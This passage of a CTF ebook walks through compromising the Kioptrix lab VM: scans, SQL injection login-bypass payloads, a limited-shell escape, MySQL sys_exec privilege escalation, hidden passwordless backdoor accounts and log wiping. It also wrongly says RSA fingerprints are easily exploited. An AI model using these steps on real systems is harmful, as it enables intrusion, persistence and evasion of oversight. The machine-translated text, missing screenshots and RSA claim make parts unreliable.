chmod value of each file, we can give the command ls -l.

If we want to see the value of chmod on the file / etc / passwd contained in

Kioptrix, then we typed commands

ls -l / etc / passwd file on the Linux terminal, as shown below.

The results of the command is the following.

b. Pengaturan akses user pada Linux.

Pada Linux, pengaturan akses suatu user disimpan pada file /etc/passwd. Coba

kita perhatikan baris ini dengan seksama. Ini adalah baris untuk settingan user

root pada sistem Kioptrix.

1.5. Conclusion

Ethical hacking is more than just running the hacking tools and gain unauthorized access
to a

system just to see what can be accessed on the system. When performed by a
professional

security, ethical hacking should also include all aspects of surveillance and information

gathering and structured, and able to perform the approach and analysis of attacks
carried out.

Ethical hacking requires a thorough knowledge of the system and hacking tools, also
requires a

lot of patience and be able to refrain from destroying deliberately. Basically, hacking
can be

done ethically and in reality today is that the ethical hacking is being supported and
shaped by

several government agencies and the private sector to ensure that a system is secure.

Capture The Flag & Hacking Kioptrix Server

2 January 2017
[ENGLISH-BRIEF EXPLANATION]

page: 22 from 74

CHAPTER 2:

SET-UP HACKING LAB

2.1. Preliminary

Each Ethical Hacker must have a special place to practice and learn. Most of the starters
a bit of

confusion about how to learn hacking without dealing with the realm of law. That is why
we

need to create a private lab to do the hacking. The lab we must create the conditions
covered /

isolated (closed), so the attack we are studying will not be harmful to unintended targets.

Basically, the labs are to avoid the things that we do not ingikan.

In this lab, you will be free to experiment and simulation in studying hacking. In general,
the lab

must have at least two machines, namely the attacker's machine and the target machine.
In

other words, minimal components of the lab is the attacker and the victim. In general, the

penetration testing activity can cause very damaging effects, it is because most of the
tools and

exploits that we will use has the potential to cause harm or can even force the target
system

becomes dead. In most cases, it is easier to install again (reinstall) a system, rather than
fix

(repair). That is, to make application virtualization becomes a very suitable choice
when

building a private lab.

In the experiments used in this book, the attacker's machine that we use is the Operating
System Backtrack 5 R3, while the target machine we use is the Operating System Level
1.3

Kioptrix Server Hyper-V.

2.2. Preparation Software

First, download an application virtualisation. Application virtualization is an

application that

allows a computer to run one or more operating systems without a reboot. With
application

virtualization, we can run many operating systems simultaneously without rebooting. ).

There

are many examples of virtualized applications, one of which is a VMWare Virtual

Machine. In

this experiment, application virtualization will be used

VMWare Virtual Machine is v. 9.0. VMWare is used to run the Operating System
Backtrack 5 R3

(as the attacker Operating System) and Kioptrix Server Operating System (as a victim
Operating

System

VMWare Virtual Machine v. 9.0 used in the experiments in this book, can be
downloaded on

the page https://my.vmware.com/web/vmware/downloads. Also, please remember to

download Backtrack and Kioptrix Server with file extension ISO.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 23 from 74

2.3. Install a Guest Operating System Manually

Installing a guest operating system in a virtual machine is similar to installing an

operating

system on a physical computer. If you do not use Easy Install when you create a virtual
machine

in the New Virtual Machine wizard, you must install the guest operating system
manually.

You can install a guest operating system from an installer disc or ISO image file. You
can also

use a PXE server to install the guest operating system over a network connection. If the
host

configuration does not permit the virtual machine to boot from an installer disc, you can
create

an ISO image file from the installer disc.

Prerequisites

a. Verify that the operating system is supported. See the online VMware Compatibility

Guide on the VMware Web site.

b. See the VMware Guest Operating System Installation Guide for information on the
guest

operating system that you are installing.

Procedure

1. If you are installing the guest operating system from an installer disc, configure the

virtual machine to use a physical CD-ROM or DVD drive and configure the drive to

connect at power on.

a. Select the virtual machine and select VM > Settings.

b. On the Hardware tab, select CD/DVD drive.

c. Select Connect at power on.

d. (Remote virtual machine only) Select the location of the CD-ROM or DVD drive.

e. Select Use physical drive and select a the drive.

f. Click OK to save your changes.

2. If you are installing the guest operating system from an ISO image file, configure the

CD/DVD drive in the virtual machine to point to the ISO image file and configure the

drive to connect at power on.

a. Select the virtual machine and select VM > Settings.

b. On the Hardware tab, select CD/DVD drive.

c. Select Connect at power on.

d. (Remote virtual machine only) Select the location of the ISO image file.

e. Select Use ISO image file and browse to the location of the ISO image file.

f. Click OK to save your changes.

3. If you are installing the guest operating system from an installer disc, insert the disc in

the CD-ROM or DVD drive.

4. Power on the virtual machine.

5. Follow the installation instructions provided by the operating system vendor.

6. If the operating system consists of multiple installer discs and you are prompted to

insert the next disc, insert the next disc in the physical drive.

7. If the operating system consists of multiple ISO image files, select the image file for
the

next CD.

a. Select VM > Removable Devices > CD/DVD > Disconnect and disconnect from the

current ISO image file.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]
page: 24 from 74

b. Select VM > Removable Devices > CD/DVD > Settings and select the next ISO
image

file.

c. Select Connected and click OK.

8. Use the standard tools in the operating system to configure its settings.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 25 from 74

CHAPTER 3:

RECONNAISSANCE,

SCANNING &

ENUMERATION

The initial step of the process of hacking is collecting information about the target. The

collection of information, also known as footprinting, is the process of gathering all the

information related to a target organization. Now, with the Internet, that information can
be

collected easily from a variety of sources. A hacker using the technique of gathering

information to determine the most potential targets, which is why the collection of
information

becomes very valuable. The purpose of collecting information not only helps identify
where

potential targets are located, but also help determine how best to gain access to the
target. The

collected information can then be used to identify targets so that hackers gain access to
the
target

Social engineering (rekasaya social engineering) can also be used to obtain more
information

about the organization, which in turn may lead to attacks seriously enough. Social
engineering

can be used as an information-gathering tool is very effective, because these attacks take

advantage of the most vulnerable asset in an organization, the carelessness of people

within

the organization. Human interaction and a desire to provide information, make

carelessness

insiders to gather the information we want. Good social engineering techniques can
speed up

the process of hacking and in most cases will result in more information easily and
quickly.

In this chapter, we will look at how the collection of information as a first step in
hacking

against our target system.

3.1.

Preparing Backtrack

Backtrack did check the connection by checking the configuration of the network, here

are the steps:

1. Open terminal Backtrack

2. Type ifconfig

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 26 from 74
Result is below:

At picture, we can see that IP Address from Backtrack is: 192.168.36.163

3.2.
Find and locate the target system

Find and map all hosts connected to the same network as the network Backtrack us,

here are the steps:

1. Open terminal Backtrack

2. Type netdiscover –i eth3 –r 192.168.36.163, as this picture below:

Wait until the search process selasai do.

Description: tools netdiscover been selected for this tool can locate and map all hosts

are one network with the network Backtrack. Options -i eth3 been selected for the

network interfaces are active at the interface eth3 Backtrack. Options -r 192.168.36.163

have to be looking for any host that can be reached by IP Backtrack itself.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 27 from 74
Here are the search results when completed:

From the picture above, we can conclude that the number of hosts that can be achieved

by Backtrack is a three hosts. Due to, 192.168.36.2 and 192.168.36.254 is the IP

Address

that is created solely by the application Virtual Machine, it can be ascertained that the

target server IP Address is: 192.168.36.209

3.3.

Information about the target server

The temporary information we get about the target server is that the target server has

an IP Address 192.168.36.209. Here is the view target server:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 28 from 74
CHAPTER 4:
DETECTION SERVICE
4.1.

Figuring out the service list using nmap

To find out the list of services running on the target server, we can use nmap, here are

the steps:

1. Open a terminal Backtrack

2. Type nmap -A -sS -PN 192.168.36.209

The result is the following:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 29 from 74
4.2.

The conclusions of detection service

Here are the conclusions of a detection service.

1. In the service ssh (port 22)

Conclusion:

1. The user default for ssh is user: root

2. Key fingerprint for this server is RSA type.

Based on http://en.wikipedia.org/wiki/RSA_problem, key fingerprint RSA can

be exploited easily.

2. In the service http (port 80)

Conclusion:

This web server don’t support HTTPS.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 30 from 74
CHAPTER 5:
VULNERABILITY
ASSESTMENT

5.1.

Vulnerability Assestment using Mozilla Firefox

Because port 80 opened, then it helps us try to find security holes in terms of service

HTTP (port 80). Here are the steps:

1. Open browser Mozilla Firefox

2. Type at address bar: 192.168.36.209 => IP Address target

3. Try login with this account information:

- Username : admin

- Password : admin

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 31 from 74
4. Click Login.

5. Because the username dan password is worng, then this picture appeard :

From the picture above, we can conclude that:

1. Method used application is the POST method.

2. Information to input username, stored in the variable " myusername".

3. Information to input a password, stored in the variable " mypassword".

4. All user input to be sent to a file checklogin.php

6. Now, we try again to login with the information as shown below:

- Username : admin

- Password : ‘

7. As it turned out, the server gives the following error message:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 32 from 74

Oppsss ... It turns out that the server is vulnerable in terms SQL Injection.

8. Now, we try again to login with the information as shown below:

- Username : ‘

- Password : admin

9. As it turned out, the server gives the following error message:

From the result of trial and error before, we can conclude that in fact the input for

username can not be exploited by using SQL Injection. However, the good news, the

input for poorer password can be exploited by using SQL Injection. So that once we
got to know a valid username and password in order to log, now we only need to

know a valid username, and we do not need to know a valid password.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 33 from 74

5.2.

Vulnerability Assestment using OWASP Dir Buster

To find information about valid user of the system, we can use the tools known as

fuzzers. Fuzzers are tools that can guess and draw up a list of the directory structure of a

target server.
Because the server has a web application server, then we must use fuzzers that can have

features as the Web Application Fuzzers, one of which is the OWASP Dir Buster.
Here

are the steps for using the OWASP Dir Buster:

1. Click Applications from Taskbar.

2. Highlight BackTrack

3. Highlight Vulnerability Assessment

4. Highlight Web Application Assessment

5. Highlight Web Application Fuzzers

6. Click dirbuster

7. Here is a view of OWASP Dir Buster:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 34 from 74
8. Set the configuration of OWASP Dir Buster, with this following information (as

described at this picture below):

Information:

- Target URL

http://192.168.36.209:80/

Target URL is information about a target URL wants

to- bruteforce using fuzzers, in this case the server Kioptrix4.

- Work Method

Auto Switch (HEAD and GET)

Work Method is information about the type of method you want to use,

in this case we use the Auto only.

- Number of Threads

10 Threads

Number of Threads is information how many threads that will be used

during the work. The more threads that we give them, the faster the

process of work, but it will cause us to be a bit Backtrack noticeably

slowed.

- Select scanning type

: Pure Brute Force

Select scanning type is the kind of information the search to be done,

whether the search is based on a list that has been prepared (Bruteforce
based dictionary) or actually using bruteforce (pure bruteforce).

9. Then click the Start button, the search process will start soon.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 35 from 74

10. The following is a report that, given:

From the statements above, we can conclude that there are two names of people,

namely john and robert. Most likely they are a valid user on a web server.

11. In order to prove whether they are a valid user or not, then we re-open the Mozilla

Firefox browser, and then access http://192.168.36.209:80/john, the results are as

follows:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 36 from 74

12. Now let us click on the file john.php, but the results we are instead redirected to the

front page of the web, namely: http://192.168.36.209.

So we can conclude that we access http://192.168.36.209/john/john.php but have

not logged in, then we will soon be transferred to http://192.168.36.209 and forced

to login first.

To test the user robert is valid on the server, we can use the same steps as trying

user john. Now let us access http://192.168.36.209/robert/ robert.php turns out

that we will soon be transferred to http://192.168.36.209 and forced to login first.

From a number of experiments we have done, we can conclude that there are two

users to servers in terms of web applications, namely john and robert. But the

problem is, we do not know the password for both of them so that we are not able

to log into the system. But fortunately, the input to receive the password on a web

application SQL Inject proved to have weaknesses, so that we can log into the

system enough to know a valid username only.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 37 from 74
CHAPTER 6:
EXPLOITATION
6.1.

Exploitation using SQL Inject Me

There are many tools that can exploit security gaps in terms of SQL Injection, one of

which is SQL Inject Me, one of the browser's add-ons OWASP Mantra in Backtrack.

Here are the steps for using SQL Inject Me:

1. Open terminal Backtrack

2. Type cd /pentest/web/mantra

3. Type ./mantra

4. This will bring up a browser with the following display:

5. Press the F10 key to display the menubar.

6. Click menu Tools.

7. Highlight on Application Auditing,

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 38 from 74
8. Highlight on SQL Inject Me ,

9. Click Open SQL Inject Me Sidebar

Pictures to call SQL Inject Me.

10. Then will come a sidebar as shown below:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]
page: 39 from 74

11. Then, complete the information requested on SQL Inject Me.

- In the column myusername, please type john.

- In the column mypassword, please provide a check.

- In the column next to the list Execute button, choose Run all test.

12. Click the Execute button, and wait for the search process.

Capture The Flag & Hacking Kioptrix Server

2 January 2017
[ENGLISH-BRIEF EXPLANATION]

page: 40 from 74

13. The following is a report when the process has been completed:

Here is a detail report:

Conclusion:

- Of the 14620 trial, found three trials that may have gaps.

- The third trial was:

o Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31

o Tested value: ' OR username IS NOT NULL OR username = '

o Tested value: 1' OR '1'='1

The third value can potentially create SQL Injection effects to input the password
on input variables mypassword.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 41 from 74

14. Now, we will try to login using a login information.

TRIAL 1

Now let's try to login with the following information:

- Username

: john

- Password

: %31%27%20%4F%52%20%27%31%27%3D%27%31

The result is:

Well, it turns out the experiment .. SQL Injection that is, not able to exploit the

server.

TRIAL 2
Now let's try to login with the following information:

- Username

: john

- Password

: ' OR username IS NOT NULL OR username = '

The result is:

Wow ... The system has been assumed we had been logged by user john even

without a password.

TRIAL 3

Now let's try to login with the following information:

- Username

: john

- Password

: 1' OR '1'='1

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 42 from 74
The result is:

Just like the second experiment, we assume the system has been logged in using

a valid username and password from the user john.

TRIAL 4

The fourth experiment is an experiment last attempt to login as a john. Based on

the results of the first trial until the third attempt, now let's try to login with the

following information:

- Username

: john

- Password

: MyNameIsJohn

The result is:

Yupp .. Apparently it's a valid account for the user john is:

- Username

: john

- Password

: MyNameIsJohn

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]
page: 43 from 74

This experiment is to try to log in as user robert.

TRIAL 1

Now let's try to login with the following information:

- Username

: robert

- Password

: %31%27%20%4F%52%20%27%31%27%3D%27%31

The result is:

Well, it turns out the experiment .. SQL Injection that is, not able to exploit the

server.

TRIAL 2

Now let's try to login with the following information:

- Username

: robert
- Password

: ' OR username IS NOT NULL OR username = '

The result is:

Wow ... The system has been assumed we had been logged by user robert even

without a password.

TRIAL 3

Now let's try to login with the following information:

- Username

: robert

- Password

: 1' OR '1'='1

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 44 from 74

The result is:

Just like the second experiment, we assume the system has been logged in using

a valid username and password of the user robert.

TRIAL 4

The fourth experiment is an experiment last attempt to login as a john. Based on

the results of the first trial until the third attempt, now let's try to login with the

following information:

- Username

: robert

- Password

: ADGAdsafdfwt4gadfga==

The result is:

Yupp .. Apparently it's a valid account for the user robert is:

- Username

: robert

- Password

: ADGAdsafdfwt4gadfga==

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 45 from 74
6.2.

Exploitation using SSH

Because we had to get two pieces of valid account, and also because the service ssh

(port 22) is open, then it would not hurt us to conduct experiments to login using ssh.

Here are the steps to perform ssh.

1. Open terminal Backtrack

2. Type ssh john@192.168.36.209

3. Type MyNameIsJohn

4. The following screen will appear:

Congratulations, it turns out we can log into the system using ssh as john.

Additional:

We can also log into the system using ssh as robert, by the way:

1. Open terminal Backtrack

2. Type ssh robert@192.168.36.209

3. Type ADGAdsafdfwt4gadfga==
4. The following screen will appear:

5. Okay now we have been logged. But apparently this user has limited access

rights, so it can only run a few commands.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 46 from 74

To see what commands can be executed by the user, then simply type? or help, as

shown below:

So, apart from the eight (8) of the command, the system will not carry out the order.

For example, when users type the command passwd, whoami, and pwd, a message

will appear as follows:

Now, let's try a command to move to the topmost directory (/), with syntax cd /, but

it appears the following error message:

This is bad ... It turns sintax to go to the top of the directory is considered

unacceptable by the system, and unfortunately the user will not be warned again, if

the user did sintax banned again.

At the moment we typed syntax banned again (in this case is the cd / more), the

user is immediately removed from the system.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 47 from 74
CHAPTER 7:
GAINING ACCESS
7.1.

Break from limited shell

User john and user robert has been registered as a regular user and have limited access

rights as a shell, so it can only run a few commands.

One way to get out of the restriction is limited shell by typing the command echo

os.system ('/ bin / bash') to the user terminal being logged (in this example: user john),

as shown in the following figure:

Hooray .... Now the user john is not in conditions of limited access as a shell. Now the

user has been able to execute all commands on the server system.

Table difference limited user without shell (john) with a user with limited shell (robert),

is as follows:

Command

User with limited shell (john)

User without limited shell (robert)

id

uname -a

whoami

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]
page: 48 from 74

7.2.

Looking processes run by root

To become root, we must find what processes are running with root privileges. To find

the process, use the command ps -aux | grep root from ssh terminal user john, so the

result is the following:

Let us focus on the part shown by this image:

In the image above there are three (3) line terminal marked. The third order was

executed with root privileges. The third commandment is:

1. /bin/sh /usr/bin/mysqld_safe

2. /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-

file=/var/run/mysqld/mysqld.

3. logger -p daemon.err -t mysqld_safe -i -t mysqld

Of the three peririntah it, we conclude that the order for the service (service) mysqld,
turned out to be run with root privileges.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 49 from 74

7.3.
Taking over access account mysqld

Due to mysqld run with root privileges, so if we take over mysqld access, then each

command that we give to mysqld will be executed and processed with root privileges

also.

Previously, we had already learned that every user input in Web applications will be

processed by the file checklogin.php. Therefore, we need to see the contents of the file.

To view the contents of the file, the user terminal john, type

cat /var/www/checklogin.php, so it will display the contents as shown below:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 50 from 74

From the picture below, let us focus on two rows of terminals that have been marked:

Hahaahh ... As it turned out, the account to access the service mysqld is:

- Username

: root

- Password

:
Oops, it turns out the password is blank

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 51 from 74

7.4.

Login as service mysqld

As we have seen earlier that the service mysqld runs with root privileges. That means,

every command run by mysqld will be run by the system with root privileges. Here are

the steps to log into the system using the account service mysqld:

1. On the user terminal john, type mysql -u root -h localhost, as shown below:

2. Now we have successfully logged in as service mysqld, without asking for a

password, because the password for the account is empty /no password.
3. To determine the rights of what can be done by the user who is currently logged in

(ie user mysqld), please enter the following: show grants

From the picture above, we conclude that we are permissions as root on the system

server (localhost).

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 52 from 74

7.5.

Modify file /etc/passwd

The entire account information stored on the server configuration file / etc / passwd.
Therefore, we will try to do pemodifiasian on the file, here are the steps:

1. In terminal type the command: ls –l /etc/passwd

2. The output of the command is the following:

Conclusion:

- The file is created by the username root, and the root has permissions to

read and write.

- These files can be accessed by the root user group, with access rights only to

read only.

- The file can be accessed by anyone, other than the username root and the

root user group, with access rights only to read only.

So that it can be concluded that the configuration for chmod it was 644, with a

caption:

- 6 => (r)ead = 4 + (w)rite =2

=> for username root

- 4 => (r)ead = 4

=> for usergroup root

- 4 => (r)ead = 4

=> for user except username root dan

usergroup root

3. Type command cat /etc/passwd

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 53 from 74
4. Note this line more closely:

This is the line for the root user settings:

This is the line for setting user john and robert:

Information:

- root : x : 0 : 0 : root : /root : /bin/bash

- john : x : 1001 : 1001 : ,,, : /home/john : /bin/kshell

- robert : x : 1002 : 1002 : ,,, : /home/robert : /bin/kshell

(1) : (2) : (3) : (4) : (5) : (6) : (7) Information:

(1) is the name of the registered user on the system

(2) is a kind of password, stored in the x artinyapassword /etc/shadow

(3) is the number of usernames on the system (UserID)

(4) is the user group number on the system (GroupID)

(5) is additional information / information supplementary to the user name

(6) is the location of the user's home directory

(7) is the location of the shell used

Well, from the third row we can conclude that the root user makes is special and

different from the user john and robert is the information number (3), (4), and (7).

Therefore, we will try to replace john user rights in order to have equal rights with

the root. However, the problem is only the root user has the right to write. How can

I make the user john can write the file?

Oppps, .. Do not forget, if it turns out we have mastered mysqld account access
service, which can run all similar commands with root privileges. So, we can instruct

the service mysqld to change the permissions of this configuration file, so that the

user john has access to write the file.

5. Login at the mysqld, and type the following command: select sys_exec ("chmod 777

/etc/passwd"); , The order aims to sets the value of the permissions for the file

/etc/passwd to be 777

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 54 from 74

So the result is:

Successfully. From the picture above, we can conclude that the permissions for the
file is 777.

6. Now, type mysqld, then type: ls –l /etc/passwd, and the result is:

Now, all users on the system (including user john) has full permissions for that file.

7. Then type the command vim /etc/passwd, to edit a file's contents, and change

line john:x:1001:1001:,,,:/home/john:/bin/kshell

into john:x:0:0:,,,:/home/john:/bin/bash

Change into

8. Then, the window kernel ssh user john, type whoami.

The result is:

9. Then, the window kernel ssh user john, type the command id.

10. Apparently, the system is still not assume that the user john has root privileges,

therefore, we should first log out of the window ssh user john.

To exit the shell unlimited mode, type the exit command, so the result is:

Now the user john has entered into limited mode shell, and to get out of the window

ssh, simply type the command exit.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 55 from 74
11. Once we close the ssh connection to us, let us go back ssh connection.

12. Login using your username john and password MyNameIsJohn, then the result is:

Violaa ... We managed to log in as root. To prove that we are the root, we type

whoami and id, the result is:

Haaa .. now on this server there have been two usergroup as the root user, the first

user named root, and the second user named john. In other words, now is

comparable with the john user root, and has the full rights to the system.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 56 from 74

7.6.

Bukti bahwa kita adalah root

Due to this server is designed to be used as learning material for beginners (like me) in

order to deepen their knowledge about the security of the system, the team of

developers from this server has prepared a 'testament message' for the attacker who

managed to become root. To view the message, simply type the command:
cat /root/congrats.txt

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 57 from 74
CHAPTER 8:
BACK DOOR
8.1.

Make a regular user as a back door

Because we do not want to suspect the root user john user who has root privileges,

then we will create a new user who has the right of access as a normal user (equivalent

to user robert). Regular user that will be created should not arouse suspicion. In this

case, we will create a user alex, because the root user alex will assume that this is a

valid employee who works on LigGoat Employee.

Steps to create a new user is:

1. In the window ssh as root, type useradd alex. The syntax for creating a new user

with the username alex, the password is empty, as shown below:

2. Evidence that the user alex been created, simply type the command

cat /etc/passwd, so the result is:

3. Okay, alex user has created. However the location of the shell used is in the /bin/sh.

Supposedly, a user with access level equivalent to the john and robert is the location

of shell that used to be in /bin/kshell.

Therefore, we will change the contents of the file, and change the location of the

shell for user alex, by typing the command vim /etc/passwd.

Picture:

Change to

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 58 from 74

4. Now the user alex was in a state of limited access as a shell, so that the root user
will

not be suspicious of user alex that we have created just now

Evidence that the user alex are in a condition as limited shell access:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 59 from 74

8.2.
Creating a user with root access as a back door

In fact, simply adding normal user (user alex), we can regain root access. However, as a

precaution, if a user alex was removed at being caught, we must have a backup plan for

the driveway from the back door.

Display when user alex would like to take permissions as root:

From the picture above, we can conclude that:

- User alex can be out of fashion limited shell.

- User alex can not switch user to root, because it does not know the password

for the root user.

- User alex the user can switch to john (which have equivalent rights root),

because it already knows the password for the user john.

Similar root user which we will create also should not arouse suspicion. In this case,
we

will create a user syskioptrix, because the root user syskioptrix will assume that this is
a

service that runs to the log file storage on the server.

Steps to create a new user is:

1. In the window ssh as root, type useradd syskioptrix. The syntax for creating a new

user with the username syskioptrix, the password is empty, as shown below:

2. Evidence that the user syskioptrix has been created, simply type the command

cat / etc / passwd, so the result is:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 60 from 74
3. Okay, syskioptrix user has created. However the location of the shell used is in the

/bin/sh. Supposedly, a user with root access level is equivalent to the location of

shell that used to be in /bin/bash. Therefore, we will change the contents of the file,

and change the location of the shell to the user syskioptrix, by typing the command

vim /etc/passwd. And to complicate the root user in finding syskioptrix user, then

we will make user information syskioptrix located on the second line, just below the

line to the root user

Picture:

Change to

4. Congratulations. Syskioptrix user now, had been in as root.

Supplement: Deliberately user alex and syskioptrix not given a password, so do not
give root

user suspicion, and to make it easier to log back into the server without authentication.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 61 from 74
CHAPTER 9:
CLEARING TRACK
9.1.

Restoring user access rights of john

Now john has become the root user. However, if we let it remain sustainable, then the

actual root user will be suspicious and it could be the end of our careers in terms of the

takeover server.

Here are the steps to restore user access rights john:

1. As root, change the configuration information back to the user john /etc/passwd

Change to

2. As root, change file permissions back /etc/passwd.

Change to

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 62 from 74
9.2.

Removing the entire file log service

We must erase the entire contents of the log file service so that more and eliminating

traces of us, that we have ever signed in as root. The entire log file located in the

directory /var/log, so that the content is as follows:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 63 from 74
From the picture above, we can conclude how lucky we have gained root privileges, so

that we can freely do anything on the system.

In this case, the log service that we want to remove is log service apache2, ssh,
daemon,

and syslog.

1. Removing log service apache2

To remove log service apache2, the following are the steps:

1. Go to directory apache2, so it is:

Evidence that the results of our exploitation through service apache2 has been

stored in a log service, please type the command to read the contents of the file

access.log.1, then the result is:

On the line I've circled, we can see that it is the content of one of the characters

that can trigger techniques SQL Injection.

It is proof that we have done in bruteforce using SQL Injection SQL Injection Me:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 64 from 74

This is proof that we have done against a target of tools nmap:

IP Address This is proof that we recorded in the log apache2:

2. Preferably, we do not delete the file. We re all pretty overwrites files with blank

characters, by typing the command

echo> [nama file yang ingin kita timpa].

Thus, if we type ls -l, the result is:

Ok. The entire log file for apache2 service has been successfully secured. Now

we will try the same thing for other log file service.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 65 from 74

2. Removing log service ssh

To delete the log service ssh, here are the steps:

1. File log ssh saved at file /var/log/auth.log

To see whether or not the IP Address we recorded in the log, please type the

command: cat /var/log/auth.log | grep 192.168.36.163, so it is:

2. We will overwrite the file with a blank character, with the command

echo>/var/log/auth.log, so the result is:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 66 from 74
3. Removing log service daemon

To remove log service daemon, the following are the steps:

1. File log daemon saved at file /var/log/daemon.log

To see whether or not the IP Address we recorded in the log, please type the

command: cat /var/log/daemon.log | grep 192.168.36.163, so it is:

2. We will overwrite the file with a blank character, with the command

echo>/var/log/ daemon.log, so the result is:

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 67 from 74

4. Removing log service syslog

To remove log service syslog, the following are the steps:

1. File log syslog saved at file /var/log/ syslog.log dan /var/log/ syslog.log.0

To see whether or not the IP Address we recorded in the log, please type the
command: cat /var/log/syslog.log | grep 192.168.36.163 juga cat

/var/log/syslog.log.0 | grep 192.168.36.163, so it is:

2. We will overwrite the file with a blank character, with the command

echo>/var/log/syslog.log.0, sehingga hasilnya adalah:

Conclusion:

Because we have to delete the entire log file that we found, it can minimize the chances
that

the root can find our trail.

Additional:

After all the activities in this tutorial we have done, the last thing we need to do is to log
out of

the service ssh as root.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 68 from 74
CHAPTER 10:
SET-UP CTF – Fast Hacking
Competition

10.1. Introduction

Competition network's security is a competition that aims to test the ability of computer
users in terms

of network administration, information system security, software security loopholes in

the system, in

the limited time to familiarize themselves with everyday life on the security of the
network and server

security system. There are several types of security competition models, namely:

a. Death Match Tournament, hacking competition in the local network (local area
network)

competition in which each participant will attempt to configure to cover vulnerabilities

that exist

on their own servers and server hacking against opponents.

According to the Ministry of Defense, in outline, the topology is as follows:

Death Match Tournament participant referred to as the Blue Team and perform hardening
on its

own server. Then, there will be several other participants who will act as examiner
(referred to

as Red Team), who will try to attack and take over the Blue Team participants server.
Blue Team

must maintain a server by simply using the software package locally without using the
internet.

The winner is the participant Blue Team which had survived the attack by the Red Team
and the
Blue Team attack other.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 69 from 74

b. Capture The Flag (or CTF), on the model of this competition, all competition
participants will

compete with each other to take over a server that has been provided by the committee.
In this

competition, participants of the competition will not do hardening, since their goal is to
be able

to sign in to the server quickly.

However, when a team competition participants managed to take over the server,
competition

participants are allowed to perform on the server hardening, with the aim to prevent so
that no

other competition participants may log into the server. Upon entry into the server,
participants

should be able to find a flag (a file or code) that had been prepared by the committee.

Participants who find these flags declared the winner.

c. Digital Forensic Investigation, is a competition that requires participants to carry out

the process

